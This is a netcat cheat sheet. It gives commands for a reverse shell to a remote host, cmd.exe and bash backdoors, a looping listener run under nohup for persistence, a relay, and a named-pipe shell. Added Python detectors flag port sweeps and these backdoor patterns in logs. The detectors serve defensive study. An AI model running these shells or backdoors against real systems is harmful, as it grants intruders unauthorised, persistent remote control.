Netcat rocks my socks


Connect to a TCP socket on <host>, port 81

nc <host> 81

Listen on the local machine for inbound TCP connections on port 81

nc -nvlp 81

Reverse shell sent to <host> over TCP port 53

nc <host> 53 -e /bin/bash

Backdoor listening on TCP 80 that executes cmd.exe when a client connects

nc -nvlp 80 -e cmd.exe

More Fancy

Attempt to connect to each port from 10 to 90 on <host>: -n skips name resolution, -z sends no data (zero-I/O mode, just checks whether the port accepts a connection), and -w1 waits only 1 second per connection

nc -nvzw1 <host> 10-90
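From the receiving side, a -z sweep like the one above shows up as one source touching many distinct ports in a short span. The following detector is an added example (not part of the original cheat sheet); it assumes a simple one-line-per-connection-attempt log in the constructed format "<epoch-seconds> <src-ip> <dst-ip> <dst-port>", which you would swap for your firewall or flow-log format.

```python
"""Flag single-source port sweeps of the kind `nc -z <host> 10-90` produces.

Added example, not part of the original cheat sheet. Log format is
constructed: "<epoch-seconds> <src-ip> <dst-ip> <dst-port>", one line per
connection attempt.
"""
from collections import defaultdict

# Constructed sample: 10.0.0.5 walks ports 10..90 on 10.0.0.9 within one
# second, while 10.0.0.7 makes two ordinary connections a few seconds later.
SAMPLE_LOG = "\n".join(
    [f"1700000000.{i:02d} 10.0.0.5 10.0.0.9 {port}"
     for i, port in enumerate(range(10, 91))]
    + ["1700000003.00 10.0.0.7 10.0.0.9 80",
       "1700000004.00 10.0.0.7 10.0.0.9 443"]
)


def parse_line(line):
    """Split one constructed log line into (timestamp, src, dst, port)."""
    ts, src, dst, port = line.split()
    return float(ts), src, dst, int(port)


def find_port_sweeps(log_text, min_ports=20, window_seconds=60.0):
    """Return {src: sorted distinct ports} for every source that touched at
    least min_ports distinct destination ports inside any window_seconds span.

    A sliding window over each source's time-sorted events keeps the check
    linear in the number of events; all ports seen in any window that crosses
    the threshold are reported, so the full 10..90 range comes back, not just
    the first 20 ports that tripped the rule."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, src, _dst, port = parse_line(line)
            events[src].append((ts, port))

    hits = defaultdict(set)
    for src, evs in events.items():
        evs.sort()
        lo = 0
        for hi in range(len(evs)):
            # Drop events that fell out of the window ending at evs[hi].
            while evs[hi][0] - evs[lo][0] > window_seconds:
                lo += 1
            window_ports = {p for _, p in evs[lo:hi + 1]}
            if len(window_ports) >= min_ports:
                hits[src].update(window_ports)
    return {src: sorted(ports) for src, ports in hits.items()}


if __name__ == "__main__":
    for src, ports in find_port_sweeps(SAMPLE_LOG).items():
        print(f"{src}: {len(ports)} ports, {ports[0]}-{ports[-1]}")
```

Size the window to the scan you expect to see: against ports that answer (open or RST) the whole sweep finishes in milliseconds, but against filtered ports -w1 caps each attempt at one second, so 81 ports can take over a minute and a 60 second window with a threshold of 20 still catches it.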

Netcat stops listening once the connection drops or is terminated, which can make getting another shell back annoying. Wrapping nc in an infinite bash loop is an easy way around this; run it under nohup as well so it survives the terminal closing!

while true; do echo "started"; nc -l -p 1234 -e /bin/sh; done

Netcat relay: everything received by the local host on TCP 4321 is forwarded to <host> on TCP 8123 (a plain pipe carries traffic one way only; replies from <host> do not go back to the client)

nc -l -p 4321 | nc <host> 8123

Create a netcat backdoor on a build compiled without -e support. This creates a named pipe (FIFO) that funnels data between bash and nc: bash reads its commands from the pipe and nc writes what it receives into it.

mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
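The -e backdoor, the restart loop, the relay and the named-pipe shell above all leave recognisable shapes in shell history and process command-line records. The scanner below is an added example (not part of the original cheat sheet) that tags recorded command lines matching those shapes; the input records are constructed, the netcat binary names it knows are an assumption to extend for renamed copies, and it deliberately does not flag a bare listener such as nc -nvlp 81, which is ambiguous on its own.

```python
"""Tag recorded command lines that match the netcat backdoor patterns above.

Added example, not part of the original cheat sheet. Input is a list of
command lines as captured by shell history or process auditing; the sample
records below are constructed.
"""
import re
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat"}      # assumption: extend for renamed copies
SEPARATORS = {"|", "||", "&&", "&"}
EXEC_FLAGS = {"-e", "--exec", "--sh-exec"}

# "/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe": a shell reading a FIFO
# that a netcat listener writes into (\2 is the FIFO name).
FIFO_SHELL_RE = re.compile(
    r"(?:^|\s)(\S+)\s+0?<\s*(\S+)\s*\|.*?\b(?:nc|ncat|netcat)\b.*?\s1?>\s*\2(?:\s|$)"
)
# "while true; do ... nc -l ...; done": a listener wrapped in a restart loop.
LOOP_RE = re.compile(
    r"\bwhile\s+(?:true|:|\[\s*1\s*\])\s*;\s*do\b.*\b(?:nc|ncat|netcat)\s[^;|]*-l"
)
# "nc -l -p 4321 | nc host 8123": a listener piped into an outbound netcat.
RELAY_RE = re.compile(r"\b(?:nc|ncat|netcat)\s[^|;]*-l[^|;]*\|\s*(?:nc|ncat|netcat)\s")
# "mknod backpipe p" / "mkfifo backpipe": the named pipe itself.
FIFO_CREATE_RE = re.compile(r"\b(?:mkfifo\s+\S+|mknod\s+\S+\s+p)\b")

# Constructed sample records (10.0.0.9 stands in for the remote host).
SAMPLE_RECORDS = [
    "nc -nvlp 81",
    "nc -nvlp 80 -e cmd.exe",
    "nc 10.0.0.9 53 -e /bin/bash",
    'while [ 1 ]; do echo "started"; nc -l -p 1234 -e /bin/sh; done',
    "nc -l -p 4321 | nc 10.0.0.9 8123",
    "mknod backpipe p",
    "/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe",
    "grep -e pattern /var/log/syslog",
]


def _netcat_args(tokens):
    """Yield the argument list of each netcat invocation in a token list,
    stopping at pipeline/list separators or a token ending in ';'."""
    i = 0
    while i < len(tokens):
        if tokens[i].rsplit("/", 1)[-1] in NETCAT_NAMES:
            args, j = [], i + 1
            while j < len(tokens) and tokens[j] not in SEPARATORS:
                args.append(tokens[j])
                if tokens[j].endswith(";"):
                    break
                j += 1
            yield args
            i = j
        i += 1


def _has_exec_flag(args):
    """True for -e / --exec / --sh-exec or an 'e' inside a short option cluster (-le)."""
    for a in args:
        if a in EXEC_FLAGS:
            return True
        if a.startswith("-") and not a.startswith("--") and "e" in a[1:]:
            return True
    return False


def classify(cmdline):
    """Return the list of pattern tags a recorded command line matches."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:                      # unbalanced quotes: crude fallback
        tokens = cmdline.split()
    tags = []
    if any(_has_exec_flag(args) for args in _netcat_args(tokens)):
        tags.append("exec-on-connect")
    if FIFO_SHELL_RE.search(cmdline):
        tags.append("fifo-shell")
    if LOOP_RE.search(cmdline):
        tags.append("listener-restart-loop")
    if RELAY_RE.search(cmdline):
        tags.append("relay")
    if FIFO_CREATE_RE.search(cmdline):
        tags.append("fifo-created")
    return tags


def scan(cmdlines):
    """Map each flagged command line to its tags; unflagged lines are dropped."""
    hits = {}
    for c in cmdlines:
        tags = classify(c)
        if tags:
            hits[c] = tags
    return hits


if __name__ == "__main__":
    for line, tags in scan(SAMPLE_RECORDS).items():
        print(f"{', '.join(tags):35} {line}")
```

The -c option is left out on purpose: it means "execute via sh" in ncat but something unrelated in other netcat builds, so treat it as a weaker signal tied to which binary is actually installed. A "fifo-created" hit on its own is low value; it earns attention when the same host shortly afterwards shows a netcat command redirected through that pipe name.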